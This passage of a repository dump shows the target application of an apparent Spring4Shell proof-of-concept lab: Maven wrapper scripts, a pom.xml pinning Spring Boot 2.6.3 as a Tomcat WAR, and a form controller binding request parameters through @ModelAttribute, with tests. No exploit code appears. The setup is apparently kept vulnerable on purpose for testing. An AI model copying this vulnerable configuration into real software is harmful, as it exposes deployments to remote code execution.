| # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 16 | # KIND, either express or implied. See the License for the 17 | # specific language governing permissions and limitations 18 | # under the License. 19 | # ---------------------------------------------------------------------------- 20 | 21 | # ---------------------------------------------------------------------------- 22 | # Maven2 Start Up Batch script 23 | # 24 | # Required ENV vars: 25 | # ------------------ 26 | # JAVA_HOME - location of a JDK home dir 27 | # 28 | # Optional ENV vars 29 | # ----------------- 30 | # M2_HOME - location of maven2's installed home dir 31 | # MAVEN_OPTS - parameters passed to the Java VM when running Maven 32 | # e.g. to debug Maven itself, use 33 | # set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 34 | # MAVEN_SKIP_RC - flag to disable loading of mavenrc files 35 | # ---------------------------------------------------------------------------- 36 | 37 | if [ -z "$MAVEN_SKIP_RC" ] ; then 38 | 39 | if [ -f /etc/mavenrc ] ; then 40 | . /etc/mavenrc 41 | fi 42 | 43 | if [ -f "$HOME/.mavenrc" ] ; then 44 | . "$HOME/.mavenrc" 45 | fi 46 | 47 | fi 48 | 49 | # OS specific support. $var _must_ be set to either true or false. 50 | cygwin=false; 51 | darwin=false; 52 | mingw=false 53 | case "`uname`" in 54 | CYGWIN*) cygwin=true ;; 55 | MINGW*) mingw=true;; 56 | Darwin*) darwin=true 57 | # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home 58 | # See https://developer.apple.com/library/mac/qa/qa1170/_index.html 59 | if [ -z "$JAVA_HOME" ]; then 60 | if [ -x "/usr/libexec/java_home" ]; then 61 | export JAVA_HOME="`/usr/libexec/java_home`" 62 | else 63 | export JAVA_HOME="/Library/Java/Home" 64 | fi 65 | fi 66 | ;; 67 | esac 68 | 69 | if [ -z "$JAVA_HOME" ] ; then 70 | if [ -r /etc/gentoo-release ] ; then 71 | JAVA_HOME=`java-config --jre-home` 72 | fi 73 | fi 74 | 75 | if [ -z "$M2_HOME" ] ; then 76 | ## resolve links - $0 may be a link to maven's home 77 | PRG="$0" 78 | 79 | # need this for relative symlinks 80 | while [ -h "$PRG" ] ; do 81 | ls=`ls -ld "$PRG"` 82 | link=`expr "$ls" : '.*-> \(.*\)$'` 83 | if expr "$link" : '/.*' > /dev/null; then 84 | PRG="$link" 85 | else 86 | PRG="`dirname "$PRG"`/$link" 87 | fi 88 | done 89 | 90 | saveddir=`pwd` 91 | 92 | M2_HOME=`dirname "$PRG"`/.. 93 | 94 | # make it fully qualified 95 | M2_HOME=`cd "$M2_HOME" && pwd` 96 | 97 | cd "$saveddir" 98 | # echo Using m2 at $M2_HOME 99 | fi 100 | 101 | # For Cygwin, ensure paths are in UNIX format before anything is touched 102 | if $cygwin ; then 103 | [ -n "$M2_HOME" ] && 104 | M2_HOME=`cygpath --unix "$M2_HOME"` 105 | [ -n "$JAVA_HOME" ] && 106 | JAVA_HOME=`cygpath --unix "$JAVA_HOME"` 107 | [ -n "$CLASSPATH" ] && 108 | CLASSPATH=`cygpath --path --unix "$CLASSPATH"` 109 | fi 110 | 111 | # For Mingw, ensure paths are in UNIX format before anything is touched 112 | if $mingw ; then 113 | [ -n "$M2_HOME" ] && 114 | M2_HOME="`(cd "$M2_HOME"; pwd)`" 115 | [ -n "$JAVA_HOME" ] && 116 | JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`" 117 | fi 118 | 119 | if [ -z "$JAVA_HOME" ]; then 120 | javaExecutable="`which javac`" 121 | if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then 122 | # readlink(1) is not available as standard on Solaris 10. 123 | readLink=`which readlink` 124 | if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then 125 | if $darwin ; then 126 | javaHome="`dirname \"$javaExecutable\"`" 127 | javaExecutable="`cd \"$javaHome\" && pwd -P`/javac" 128 | else 129 | javaExecutable="`readlink -f \"$javaExecutable\"`" 130 | fi 131 | javaHome="`dirname \"$javaExecutable\"`" 132 | javaHome=`expr "$javaHome" : '\(.*\)/bin'` 133 | JAVA_HOME="$javaHome" 134 | export JAVA_HOME 135 | fi 136 | fi 137 | fi 138 | 139 | if [ -z "$JAVACMD" ] ; then 140 | if [ -n "$JAVA_HOME" ] ; then 141 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 142 | # IBM's JDK on AIX uses strange locations for the executables 143 | JAVACMD="$JAVA_HOME/jre/sh/java" 144 | else 145 | JAVACMD="$JAVA_HOME/bin/java" 146 | fi 147 | else 148 | JAVACMD="`which java`" 149 | fi 150 | fi 151 | 152 | if [ ! -x "$JAVACMD" ] ; then 153 | echo "Error: JAVA_HOME is not defined correctly." >&2 154 | echo " We cannot execute $JAVACMD" >&2 155 | exit 1 156 | fi 157 | 158 | if [ -z "$JAVA_HOME" ] ; then 159 | echo "Warning: JAVA_HOME environment variable is not set." 160 | fi 161 | 162 | CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher 163 | 164 | # traverses directory structure from process work directory to filesystem root 165 | # first directory with .mvn subdirectory is considered project base directory 166 | find_maven_basedir() { 167 | 168 | if [ -z "$1" ] 169 | then 170 | echo "Path not specified to find_maven_basedir" 171 | return 1 172 | fi 173 | 174 | basedir="$1" 175 | wdir="$1" 176 | while [ "$wdir" != '/' ] ; do 177 | if [ -d "$wdir"/.mvn ] ; then 178 | basedir=$wdir 179 | break 180 | fi 181 | # workaround for JBEAP-8937 (on Solaris 10/Sparc) 182 | if [ -d "${wdir}" ]; then 183 | wdir=`cd "$wdir/.."; pwd` 184 | fi 185 | # end of workaround 186 | done 187 | echo "${basedir}" 188 | } 189 | 190 | # concatenates all lines of a file 191 | concat_lines() { 192 | if [ -f "$1" ]; then 193 | echo "$(tr -s '\n' ' ' < "$1")" 194 | fi 195 | } 196 | 197 | BASE_DIR=`find_maven_basedir "$(pwd)"` 198 | if [ -z "$BASE_DIR" ]; then 199 | exit 1; 200 | fi 201 | 202 | ########################################################################################## 203 | # Extension to allow automatically downloading the maven-wrapper.jar from Maven-central 204 | # This allows using the maven wrapper in projects that prohibit checking in binary data. 205 | ########################################################################################## 206 | if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then 207 | if [ "$MVNW_VERBOSE" = true ]; then 208 | echo "Found .mvn/wrapper/maven-wrapper.jar" 209 | fi 210 | else 211 | if [ "$MVNW_VERBOSE" = true ]; then 212 | echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..." 213 | fi 214 | if [ "$MVNW_REPOURL" = true]; then 215 | jarUrl="$MVNW_REPOURL/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.jar" 216 | else 217 | jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.jar" 218 | fi 219 | while IFS="=" read key value; do 220 | case "$key" in (wrapperUrl) jarUrl="$value"; break ;; 221 | esac 222 | done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties" 223 | if [ "$MVNW_VERBOSE" = true ]; then 224 | echo "Downloading from: $jarUrl" 225 | fi 226 | wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" 227 | if $cygwin; then 228 | wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"` 229 | fi 230 | 231 | if command -v wget > /dev/null; then 232 | if [ "$MVNW_VERBOSE" = true ]; then 233 | echo "Found wget ... using wget" 234 | fi 235 | if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then 236 | wget "$jarUrl" -O "$wrapperJarPath" 237 | else 238 | wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath" 239 | fi 240 | elif command -v curl > /dev/null; then 241 | if [ "$MVNW_VERBOSE" = true ]; then 242 | echo "Found curl ... using curl" 243 | fi 244 | if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then 245 | curl -o "$wrapperJarPath" "$jarUrl" -f 246 | else 247 | curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f 248 | fi 249 | 250 | else 251 | if [ "$MVNW_VERBOSE" = true ]; then 252 | echo "Falling back to using Java to download" 253 | fi 254 | javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java" 255 | # For Cygwin, switch paths to Windows format before running javac 256 | if $cygwin; then 257 | javaClass=`cygpath --path --windows "$javaClass"` 258 | fi 259 | if [ -e "$javaClass" ]; then 260 | if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then 261 | if [ "$MVNW_VERBOSE" = true ]; then 262 | echo " - Compiling MavenWrapperDownloader.java ..." 263 | fi 264 | # Compiling the Java class 265 | ("$JAVA_HOME/bin/javac" "$javaClass") 266 | fi 267 | if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then 268 | # Running the downloader 269 | if [ "$MVNW_VERBOSE" = true ]; then 270 | echo " - Running MavenWrapperDownloader.java ..." 271 | fi 272 | ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR") 273 | fi 274 | fi 275 | fi 276 | fi 277 | ########################################################################################## 278 | # End of extension 279 | ########################################################################################## 280 | 281 | export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"} 282 | if [ "$MVNW_VERBOSE" = true ]; then 283 | echo $MAVEN_PROJECTBASEDIR 284 | fi 285 | MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS" 286 | 287 | # For Cygwin, switch paths to Windows format before running java 288 | if $cygwin; then 289 | [ -n "$M2_HOME" ] && 290 | M2_HOME=`cygpath --path --windows "$M2_HOME"` 291 | [ -n "$JAVA_HOME" ] && 292 | JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"` 293 | [ -n "$CLASSPATH" ] && 294 | CLASSPATH=`cygpath --path --windows "$CLASSPATH"` 295 | [ -n "$MAVEN_PROJECTBASEDIR" ] && 296 | MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"` 297 | fi 298 | 299 | WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain 300 | 301 | exec "$JAVACMD" \ 302 | $MAVEN_OPTS \ 303 | -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \ 304 | "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \ 305 | ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@" 306 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/mvnw.cmd: -------------------------------------------------------------------------------- 1 | @REM ---------------------------------------------------------------------------- 2 | @REM Licensed to the Apache Software Foundation (ASF) under one 3 | @REM or more contributor license agreements. See the NOTICE file 4 | @REM distributed with this work for additional information 5 | @REM regarding copyright ownership. The ASF licenses this file 6 | @REM to you under the Apache License, Version 2.0 (the 7 | @REM "License"); you may not use this file except in compliance 8 | @REM with the License. You may obtain a copy of the License at 9 | @REM 10 | @REM http://www.apache.org/licenses/LICENSE-2.0 11 | @REM 12 | @REM Unless required by applicable law or agreed to in writing, 13 | @REM software distributed under the License is distributed on an 14 | @REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | @REM KIND, either express or implied. See the License for the 16 | @REM specific language governing permissions and limitations 17 | @REM under the License. 18 | @REM ---------------------------------------------------------------------------- 19 | 20 | @REM ---------------------------------------------------------------------------- 21 | @REM Maven2 Start Up Batch script 22 | @REM 23 | @REM Required ENV vars: 24 | @REM JAVA_HOME - location of a JDK home dir 25 | @REM 26 | @REM Optional ENV vars 27 | @REM M2_HOME - location of maven2's installed home dir 28 | @REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands 29 | @REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a key stroke before ending 30 | @REM MAVEN_OPTS - parameters passed to the Java VM when running Maven 31 | @REM e.g. to debug Maven itself, use 32 | @REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 33 | @REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files 34 | @REM ---------------------------------------------------------------------------- 35 | 36 | @REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on' 37 | @echo off 38 | @REM set title of command window 39 | title %0 40 | @REM enable echoing my setting MAVEN_BATCH_ECHO to 'on' 41 | @if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO% 42 | 43 | @REM set %HOME% to equivalent of $HOME 44 | if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%") 45 | 46 | @REM Execute a user defined script before this one 47 | if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre 48 | @REM check for pre script, once with legacy .bat ending and once with .cmd ending 49 | if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat" 50 | if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd" 51 | :skipRcPre 52 | 53 | @setlocal 54 | 55 | set ERROR_CODE=0 56 | 57 | @REM To isolate internal variables from possible post scripts, we use another setlocal 58 | @setlocal 59 | 60 | @REM ==== START VALIDATION ==== 61 | if not "%JAVA_HOME%" == "" goto OkJHome 62 | 63 | echo. 64 | echo Error: JAVA_HOME not found in your environment. >&2 65 | echo Please set the JAVA_HOME variable in your environment to match the >&2 66 | echo location of your Java installation. >&2 67 | echo. 68 | goto error 69 | 70 | :OkJHome 71 | if exist "%JAVA_HOME%\bin\java.exe" goto init 72 | 73 | echo. 74 | echo Error: JAVA_HOME is set to an invalid directory. >&2 75 | echo JAVA_HOME = "%JAVA_HOME%" >&2 76 | echo Please set the JAVA_HOME variable in your environment to match the >&2 77 | echo location of your Java installation. >&2 78 | echo. 79 | goto error 80 | 81 | @REM ==== END VALIDATION ==== 82 | 83 | :init 84 | 85 | @REM Find the project base dir, i.e. the directory that contains the folder ".mvn". 86 | @REM Fallback to current working directory if not found. 87 | 88 | set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR% 89 | IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir 90 | 91 | set EXEC_DIR=%CD% 92 | set WDIR=%EXEC_DIR% 93 | :findBaseDir 94 | IF EXIST "%WDIR%"\.mvn goto baseDirFound 95 | cd .. 96 | IF "%WDIR%"=="%CD%" goto baseDirNotFound 97 | set WDIR=%CD% 98 | goto findBaseDir 99 | 100 | :baseDirFound 101 | set MAVEN_PROJECTBASEDIR=%WDIR% 102 | cd "%EXEC_DIR%" 103 | goto endDetectBaseDir 104 | 105 | :baseDirNotFound 106 | set MAVEN_PROJECTBASEDIR=%EXEC_DIR% 107 | cd "%EXEC_DIR%" 108 | 109 | :endDetectBaseDir 110 | 111 | IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig 112 | 113 | @setlocal EnableExtensions EnableDelayedExpansion 114 | for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a 115 | @endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS% 116 | 117 | :endReadAdditionalConfig 118 | 119 | SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe" 120 | set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar" 121 | set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain 122 | 123 | set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.jar" 124 | 125 | FOR /F "tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO ( 126 | IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B 127 | ) 128 | 129 | @REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central 130 | @REM This allows using the maven wrapper in projects that prohibit checking in binary data. 131 | if exist %WRAPPER_JAR% ( 132 | echo Found %WRAPPER_JAR% 133 | ) else ( 134 | if not "%MVNW_REPOURL%" == "" ( 135 | SET DOWNLOAD_URL="%MVNW_REPOURL%/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.jar" 136 | ) 137 | echo Couldn't find %WRAPPER_JAR%, downloading it ... 138 | echo Downloading from: %DOWNLOAD_URL% 139 | 140 | powershell -Command "&{"^ 141 | "$webclient = new-object System.Net.WebClient;"^ 142 | "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^ 143 | "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^ 144 | "}"^ 145 | "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^ 146 | "}" 147 | echo Finished downloading %WRAPPER_JAR% 148 | ) 149 | @REM End of extension 150 | 151 | %MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %* 152 | if ERRORLEVEL 1 goto error 153 | goto end 154 | 155 | :error 156 | set ERROR_CODE=1 157 | 158 | :end 159 | @endlocal & set ERROR_CODE=%ERROR_CODE% 160 | 161 | if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost 162 | @REM check for post script, once with legacy .bat ending and once with .cmd ending 163 | if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat" 164 | if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd" 165 | :skipRcPost 166 | 167 | @REM pause the script if MAVEN_BATCH_PAUSE is set to 'on' 168 | if "%MAVEN_BATCH_PAUSE%" == "on" pause 169 | 170 | if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE% 171 | 172 | exit /B %ERROR_CODE% 173 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.6.3 9 | 10 | 11 | com.example 12 | spring-form 13 | 0.0.1-SNAPSHOT 14 | spring-form 15 | Demo project for Spring Boot 16 | war 17 | 18 | 1.8 19 | 20 | 21 | 22 | org.springframework.boot 23 | spring-boot-starter-thymeleaf 24 | 25 | 26 | org.springframework.boot 27 | spring-boot-starter-web 28 | 29 | 30 | 31 | org.springframework.boot 32 | spring-boot-starter-test 33 | test 34 | 35 | 36 | org.springframework.boot 37 | spring-boot-starter-tomcat 38 | provided 39 | 40 | 41 | 42 | 43 | ${artifactId} 44 | 45 | 46 | org.springframework.boot 47 | spring-boot-maven-plugin 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/settings.gradle: -------------------------------------------------------------------------------- 1 | rootProject.name = 'spring-form' 2 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/src/main/java/com/example/handlingformsubmission/Greeting.java: -------------------------------------------------------------------------------- 1 | package com.example.handlingformsubmission; 2 | 3 | public class Greeting { 4 | 5 | private long id; 6 | private String content; 7 | 8 | public long getId() { 9 | return id; 10 | } 11 | 12 | public void setId(long id) { 13 | this.id = id; 14 | } 15 | 16 | public String getContent() { 17 | return content; 18 | } 19 | 20 | public void setContent(String content) { 21 | this.content = content; 22 | } 23 | 24 | } 25 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/src/main/java/com/example/handlingformsubmission/GreetingController.java: -------------------------------------------------------------------------------- 1 | package com.example.handlingformsubmission; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.ui.Model; 5 | import org.springframework.web.bind.annotation.GetMapping; 6 | import org.springframework.web.bind.annotation.ModelAttribute; 7 | import org.springframework.web.bind.annotation.PostMapping; 8 | 9 | @Controller 10 | public class GreetingController { 11 | 12 | @GetMapping("/greeting") 13 | public String greetingForm(Model model) { 14 | model.addAttribute("greeting", new Greeting()); 15 | return "greeting"; 16 | } 17 | 18 | @PostMapping("/greeting") 19 | public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) { 20 | model.addAttribute("greeting", greeting); 21 | return "result"; 22 | } 23 | 24 | } 25 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/src/main/java/com/example/handlingformsubmission/HandlingFormSubmissionApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.handlingformsubmission; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; 6 | 7 | @SpringBootApplication 8 | public class HandlingFormSubmissionApplication extends SpringBootServletInitializer { 9 | 10 | 11 | public static void main(String[] args) { 12 | SpringApplication.run(HandlingFormSubmissionApplication.class, args); 13 | } 14 | 15 | } 16 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/src/main/resources/templates/greeting.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Getting Started: Handling Form Submission 5 | 6 | 7 | 8 |

Form

9 |
10 |

Id:

11 |

Message:

12 |

13 |
14 | 15 | 16 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/src/main/resources/templates/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Getting Started: Handling Form Submission 5 | 6 | 7 | 8 |

Result

9 |

10 |

11 | Submit another message 12 | 13 | 14 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/src/test/java/com/example/handlingformsubmission/HandlingFormSubmissionApplicationTest.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2012-2018 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * https://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | package com.example.handlingformsubmission; 18 | 19 | import static org.hamcrest.Matchers.containsString; 20 | import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get; 21 | import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post; 22 | import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content; 23 | 24 | import org.junit.jupiter.api.Test; 25 | 26 | import org.springframework.beans.factory.annotation.Autowired; 27 | import org.springframework.boot.test.autoconfigure.web.servlet.WebMvcTest; 28 | import org.springframework.test.context.TestPropertySource; 29 | import org.springframework.test.web.servlet.MockMvc; 30 | 31 | @WebMvcTest(GreetingController.class) 32 | @TestPropertySource(properties = "logging.level.org.springframework.web=DEBUG") 33 | public class HandlingFormSubmissionApplicationTest { 34 | 35 | @Autowired 36 | private MockMvc mockMvc; 37 | 38 | @Test 39 | public void rendersForm() throws Exception { 40 | mockMvc.perform(get("/greeting")) 41 | .andExpect(content().string(containsString("Form"))); 42 | } 43 | 44 | @Test 45 | public void submitsForm() throws Exception { 46 | mockMvc.perform(post("/greeting").param("id", "12345").param("content", "Hello")) 47 | .andExpect(content().string(containsString("Result"))) 48 | .andExpect(content().string(containsString("id: 12345"))); 49 | } 50 | 51 | } 52 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring4shellapplication.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BobTheShoplifter/Spring4Shell-POC/f856cf519af5c75c7cac670dcc1769f282803047/vulnerable-tomcat/spring4shellapplication.png --------------------------------------------------------------------------------